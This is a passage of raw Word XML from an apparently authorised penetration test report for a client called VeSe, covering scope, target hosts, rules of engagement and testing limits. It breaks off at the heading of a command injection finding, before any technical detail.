    <w:p w14:paraId="631970BB" w14:textId="16A902A1" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="002355AE">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc119794105"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD685CB" w14:textId="61C94F8C" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="002355AE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The test was carried out as a “White Box” security assessment, so with valid access data and a detailed knowledge of the system landscape over the internet and the internal network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FD884D" w14:textId="58A99C8F" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="002355AE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The following information was provided by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VeSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE7F4FC" w14:textId="106E3E40" w:rsidR="002355AE" w:rsidRPr="00967BAB" w:rsidRDefault="002355AE" w:rsidP="002355AE">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00967BAB">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Hostnames and IP address of the target of investigation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7056DE47" w14:textId="1D1F639E" w:rsidR="002355AE" w:rsidRPr="00967BAB" w:rsidRDefault="002355AE" w:rsidP="002355AE">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00967BAB">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Source code to all parts of the infrastructure deployed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A7A9CC" w14:textId="225D9E5C" w:rsidR="002355AE" w:rsidRPr="00967BAB" w:rsidRDefault="002355AE" w:rsidP="002355AE">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00967BAB">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A network capture of the traffic during the attack (provided as a PCAP file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C90F494" w14:textId="0B94E734" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="002355AE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The client also offered support during the whole assessment, when certain parts were unclear during the engagement. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602D3B7B" w14:textId="06608E30" w:rsidR="002355AE" w:rsidRDefault="002355AE" w:rsidP="002355AE">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc119794106"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Object of Investigation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="413B870D" w14:textId="5A8A9E6A" w:rsidR="002355AE" w:rsidRDefault="002355AE" w:rsidP="002355AE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The following IP addresses were provided by the client for this assessment:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Gitternetztabelle4Akzent2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4668"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="2280"/>
      </w:tblGrid>
      <w:tr w:rsidR="002355AE" w:rsidRPr="002355AE" w14:paraId="1223C5AD" w14:textId="77777777" w:rsidTr="00875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68CC18A1" w14:textId="3F2869F3" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IP address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78D9B9F8" w14:textId="2BC83E2E" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2280" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53C044FF" w14:textId="316932A2" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002355AE" w:rsidRPr="002355AE" w14:paraId="79E24DAA" w14:textId="77777777" w:rsidTr="00FC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2" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="7FB2653A" w14:textId="6A1DB7C6" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>13.40.105.124</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6206B35D" w14:textId="55E11508" w:rsidR="002355AE" w:rsidRDefault="002355AE" w:rsidP="002355AE">
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36F0BCCF" w14:textId="2CB7B866" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="002355AE">
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="361BD32C" w14:textId="2D617E7B" w:rsidR="002355AE" w:rsidRDefault="002355AE" w:rsidP="002355AE">
      <w:r>
        <w:t>The following website targets were provided by the client for the assessment:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Gitternetztabelle4Akzent2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4668"/>
        <w:gridCol w:w="3414"/>
      </w:tblGrid>
      <w:tr w:rsidR="002355AE" w:rsidRPr="002355AE" w14:paraId="5CE1434C" w14:textId="77777777" w:rsidTr="00E37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21AA3E52" w14:textId="5C00EFBC" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3414" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="095D570D" w14:textId="306D71F0" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>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r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IP address</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002355AE" w:rsidRPr="002355AE" w14:paraId="56ED9CAA" w14:textId="77777777" w:rsidTr="004F5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48DF8F94" w14:textId="289075F4" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>vese.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3414" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EE51F47" w14:textId="2229618F" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="00875E28">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2355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>13.40.105.124</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002355AE" w:rsidRPr="002355AE" w14:paraId="18DF7C8A" w14:textId="77777777" w:rsidTr="004F56CC">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="4668" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66359B65" w14:textId="21144A79" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>internal.vese.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3414" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31976A8D" w14:textId="6F6204C6" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>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2355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>13.40.105.124</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002355AE" w:rsidRPr="002355AE" w14:paraId="024F4A1D" w14:textId="77777777" w:rsidTr="004F5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0E9CFE0D" w14:textId="6BB8E6E0" w:rsidR="002355AE" w:rsidRDefault="002355AE" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>contact.vese.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3414" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37CB036D" w14:textId="0A9DB244" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>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2355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>13.40.105.124</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="103E04C9" w14:textId="77777777" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="002355AE"/>
    <w:p w14:paraId="7114C553" w14:textId="6D689377" w:rsidR="002355AE" w:rsidRDefault="002355AE" w:rsidP="002355AE">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc119794107"/>
      <w:r>
        <w:t>Investigation Period</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="5FEE1F36" w14:textId="4FA2346C" w:rsidR="002355AE" w:rsidRPr="002355AE" w:rsidRDefault="002355AE" w:rsidP="002355AE">
      <w:r>
        <w:t xml:space="preserve">The investigation was </w:t>
      </w:r>
      <w:r w:rsidR="00967BAB">
        <w:t xml:space="preserve">solely </w:t>
      </w:r>
      <w:r>
        <w:t>carried out on</w:t>
      </w:r>
      <w:r w:rsidR="00967BAB">
        <w:t xml:space="preserve"> saturday the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00967BAB">
        <w:t xml:space="preserve">11/19/2022. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7441F845" w14:textId="30E836EC" w:rsidR="00967BAB" w:rsidRDefault="00967BAB" w:rsidP="00967BAB">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc119794108"/>
      <w:r>
        <w:t>Rules of Engagement</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DE5891" w14:textId="6A039495" w:rsidR="00967BAB" w:rsidRDefault="00967BAB" w:rsidP="00967BAB">
      <w:r>
        <w:t xml:space="preserve">Since the targets are systems in production, security could only be examined to a certain extent. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r>
        <w:t>he following rules were agreed before the start of the test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and taken into account during the attack phase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9B8FB3" w14:textId="329A10D0" w:rsidR="00967BAB" w:rsidRPr="00D678A8" w:rsidRDefault="00967BAB" w:rsidP="00D678A8">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D678A8">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The system being the last one available, so the system would not die </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B83CAAF" w14:textId="4771A154" w:rsidR="00967BAB" w:rsidRPr="00D678A8" w:rsidRDefault="00967BAB" w:rsidP="00D678A8">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D678A8">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">No downloads of anything from the internet </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D46E735" w14:textId="653D6757" w:rsidR="00967BAB" w:rsidRPr="00D678A8" w:rsidRDefault="00967BAB" w:rsidP="00D678A8">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D678A8">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">No installation of any application </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486AD97D" w14:textId="77777777" w:rsidR="00967BAB" w:rsidRDefault="00967BAB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBAFEF2" w14:textId="6A83413E" w:rsidR="00967BAB" w:rsidRDefault="00967BAB" w:rsidP="00967BAB">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc119794109"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Limits of the Tests performed</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="454B8B22" w14:textId="77777777" w:rsidR="00967BAB" w:rsidRDefault="00967BAB" w:rsidP="00967BAB">
      <w:r>
        <w:t xml:space="preserve">A security investigation has the goal to uncover security vulnerabilities and recommend measures to remedy the situation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43953EF8" w14:textId="7E25686C" w:rsidR="00967BAB" w:rsidRDefault="00967BAB" w:rsidP="00967BAB">
      <w:r>
        <w:t>Maintaining system and network security is a dynamic process as new weaknesses in IT systems are exposed each day. The tests performed should therefore not be taken as a guarantee that the systems are permanently immune to any kind of attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198585DD" w14:textId="77777777" w:rsidR="00967BAB" w:rsidRDefault="00967BAB" w:rsidP="00967BAB">
      <w:r>
        <w:t xml:space="preserve">The test results should therefore be considered as a snapshot of system security. Changes to the systems after performing the tests may result in a positive or negative change in system security. It is therefore recommended to conduct security investigations after any major configuration change. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C23E59A" w14:textId="72935735" w:rsidR="00967BAB" w:rsidRPr="00967BAB" w:rsidRDefault="00967BAB" w:rsidP="00967BAB">
      <w:r>
        <w:t>Furthermore, safety investigations should be repeated at regular intervals. Only in this way can it be ensured that the systems are adequately protected against current attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB26CDD" w14:textId="77777777" w:rsidR="00967BAB" w:rsidRDefault="00967BAB" w:rsidP="00967BAB"/>
    <w:p w14:paraId="78705D35" w14:textId="77777777" w:rsidR="00967BAB" w:rsidRPr="002355AE" w:rsidRDefault="00967BAB" w:rsidP="00967BAB"/>
    <w:p w14:paraId="79A335FB" w14:textId="055ACC42" w:rsidR="00BD0B0F" w:rsidRPr="00967BAB" w:rsidRDefault="00BD0B0F" w:rsidP="002355AE">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="075AAD03" w14:textId="3CAC05EF" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E6C845B" w14:textId="4F89DEFE" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="773CA5C4" w14:textId="11E723F4" w:rsidR="008F1064" w:rsidRPr="002355AE" w:rsidRDefault="008F1064">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B5AF44C" w14:textId="77777777" w:rsidR="00DF6071" w:rsidRPr="002355AE" w:rsidRDefault="00DF6071">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EDD9D91" w14:textId="77777777" w:rsidR="00D85809" w:rsidRPr="002355AE" w:rsidRDefault="00D85809">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Century Gothic" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Century Gothic" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc119432376"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1539E718" w14:textId="5FA0976A" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00D85809">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Ref119792875"/>
      <w:bookmarkStart w:id="12" w:name="_Toc119794110"/>
      <w:r w:rsidRPr="002355AE">
        <w:lastRenderedPageBreak/>
        <w:t>Security Audit Findings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="22F81D35" w14:textId="248DE680" w:rsidR="00194A65" w:rsidRPr="002355AE" w:rsidRDefault="0035074C" w:rsidP="00194A65">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc119794111"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Identified</w:t>
      </w:r>
      <w:r w:rsidR="00194A65" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidR="00194A65" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69634594" w14:textId="77777777" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00BD0B0F" w:rsidP="00BD0B0F">
      <w:pPr>
        <w:pStyle w:val="Spacer"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="211E1799" w14:textId="394AAA1B" w:rsidR="00BD0B0F" w:rsidRPr="002355AE" w:rsidRDefault="00105C0C" w:rsidP="00D85809">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc9866482"/>
      <w:bookmarkStart w:id="15" w:name="_Toc119432377"/>
      <w:bookmarkStart w:id="16" w:name="_Toc119794112"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Co</w:t>
      </w:r>
      <w:r w:rsidR="00F308CB" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mmand</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Injection </w:t>
      </w:r>
      <w:r w:rsidR="006234C2" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>– Docker application “</w:t>
      </w:r>
      <w:r w:rsidR="006234C2" w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pseudo-terminal</w:t>
      </w:r>
      <w:r w:rsidR="006234C2" w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BD0B0F" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
